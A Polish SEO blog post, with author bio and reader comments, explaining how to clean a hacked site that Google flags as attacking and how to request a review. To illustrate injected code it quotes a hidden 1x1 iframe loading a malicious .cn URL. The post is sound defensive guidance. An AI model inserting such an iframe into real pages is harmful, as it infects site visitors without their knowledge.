Optymalizacja stron

Witryna zgłoszona jako dokonująca ataków – co robić?

Czasami zdarza się, że próbując wejść poprzez wyszukiwarkę na naszą stronę widzimy nagle taki oto komunikat na stronie

Czym to zostało spowodowane?

Taka sytuacja związana jest z faktem, że ktoś się włamał się na nasz serwer u umieścił na stronie złośliwy kod. Z reguły został on umieszczany w pliku index.html/index.php i wygląda np. tak <iframe src=”http://bestlotron.cn/in.cgi?cocacola60″ width=1 height=1 style=”visibility: hidden”></iframe> – lub jest to jakiś javascript. Taki kod znajduje się on zazwyczaj zaraz za znacznikiem <body> lub przed </body> pliku HTML, w przypadku pliku PHP często na końcu pliku .

Google, dbając o bezpieczeństwo innych użytkowników Internetu poprzez wyświetlenie tego komunikatu zwraca im uwagę na to, że wejście na stronę „odbędzie” się na wyraźne „życzenie” internauty, ponieważ istnieje duże ryzyko zainfekowania komputera osoby, która będzie próbowała wejść, mimo ostrzeżenia, na taką stronę.

Oczywiście, nie oznacza to, że nasza strona już zawsze zostanie „napiętnowana”. Należy szybko sprawę wyjaśnić, i w tym celu:

1) W pierwszej kolejności – należy zmienić dane logowania do serwera i do strony; jeżeli są one zapisane w FTPie – skasuj je.

2) następnie należy usunąć ze strony złośliwy kod

3) Przeskanować komputer i pliki na serwerze dobrym programem antywirusowym

4) następnie należy się zalogować do Narzędzi dla Webmasterów, dodać swoją witrynę, zweryfikować ją – i kliknąć w link,  znajdujący się po lewej stronie, o powtórnym rozpatrzeniu strony. Z listy należy wybrać adres zainfekowanej strony (jak mamy zgłoszonych kilka witryn w Narzędziach), napisać KRÓTKO po polsku (nie lać wody) co się stało, razem z informacją, że złośliwy kod został już usunięty ze strony – i … po wysłaniu wniosku cierpliwie poczekać – z reguły do 24 godzin strona powinna być już dostępna , o ile zostały z niej usunięte wszystkie złośliwe kody, jakie zostały dopisane w wyniku włamania do kodu źródłowego naszej witryny.

Warto wiedzieć, że pod adresem http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site= (po znaku równości wpisujemy adres zainfekowanej witryny), można na bieżąco sprawdzać, czy nasza strona jest czysta, kiedy została ostatnio zainfekowana itp. Zachęcam do wpisania adresu swojej witryny i przetestowania :)

GD Star Rating
loading...
Witryna zgłoszona jako dokonująca ataków - co robić?, Witryna zgłoszona jako dokonująca ataków - co robić?, 9.5 out of 10 based on 6 ratings Witryna zgłoszona jako dokonująca ataków - co robić?

Zobacz inne wpisy z tej kategorii

napisał/a 1379 artykułów na rzecz Bloga SEO

Optymalizacja i pozycjonowanie stron i sklepów internetowych w Google to moja pasja.

Od 2008 roku jako Top Contributor pomagam webmasterom rozwiązywać problemy z widocznością ich stron w Google na Forum Pomocy Google dla Webmasterów, na którym jestem najdłuższym stażem TC w Polsce.

W 2010 roku roku założyłem pierwszego w Polsce bloga SEO skierowanego nie do branży SEO, ale stricte do właścicieli stron, na którym przystępnym językiem przybliżam Wskazówki Google dla Webmasterów, opisuję i komentuję zmiany, jakie zachodzą w algorytmie Google. Publikując wskazówki odnośnie tego, jak rozwijać strony, aby rankowały wysoko w Google, pomagam im zwiększać ruch na stronach z naturalnych wyników wyszukiwania.

SEO to także moje życie zawodowe – firma SEOProfi, której jestem właścicielem, świadczy usługi na rynku polsko, anglo- i niemieckojęzycznym.

Chcesz pozyskiwać więcej Klientów z Google?

Tak, chcę >>

Opinie i Komentarze

Colin 14 lipca 2010, 13:34

A gdy zweryfikowanie w narzędziach Google dla webmasterów jest niemożliwe, należy użyć http://stopbadware.org/home/reportsearch, po wyszukaniu domeny link „Request an independent review of partners’ findings”.

Michal 27 marca 2017, 9:58

Bardzo pomocny artykul, dziekuje

Skomentuj

Twój adres e-mail nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *